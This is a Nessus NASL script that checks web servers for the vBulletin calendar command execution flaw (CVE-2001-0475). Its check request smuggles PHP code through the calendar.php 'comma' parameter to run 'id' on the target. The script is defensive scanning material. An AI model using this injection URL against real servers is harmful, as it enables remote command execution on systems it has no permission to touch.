vbulletin_calender_command_execution.nasl

来自「漏洞扫描源码,可以扫描linux,windows,交换机路由器」· NASL 代码 · 共 62 行

 desc = "
A vulnerability in vBulletin enables attackers to craft special URLs 
that will execute commands on the server through the vBulletin PHP
script.
For more information see: http://www.securiteam.com/securitynews/5IP0B203PI.html

Risk factor : High";


if(description)
{
 script_id(11179);
 script_bugtraq_id(2474);
 script_cve_id("CVE-2001-0475");
 script_version("$Revision: 38 $");
 name["english"] = "vBulletin's Calender Command Execution Vulnerability";
 script_name(english:name["english"]);
 
 script_description(english:desc);
 
 summary["english"] = "vBulletin's Calender  Command Execution Vulnerability";
 
 script_summary(english:summary["english"]);
 
 script_category(ACT_ATTACK);
 
 script_copyright(english:"This script is Copyright (C) 2002 SecurITeam");
 family["english"] = "CGI abuses";
 script_family(english:family["english"]);
 script_dependencie("http_version.nasl", "vbulletin_detect.nasl");
 script_require_ports("Services/www", 80);
 exit(0);
}

# Check starts here

include("http_func.inc");
include("http_keepalive.inc");

port = get_http_port(default:80);


if(!get_port_state(port))exit(0);
if(!can_host_php(port:port))exit(0);


# Test an install.
install = get_kb_item(string("www/", port, "/vBulletin"));
if (isnull(install)) exit(0);
matches = eregmatch(string:install, pattern:"^(.+) under (/.*)$");
if (!isnull(matches)) {
  dir = matches[2];

  http_check_remote_code (
			unique_dir:dir,
			check_request:"/calendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22",
			check_result:"uid=[0-9]+.*gid=[0-9]+.*",
			command:"id",
			description:desc
			);
}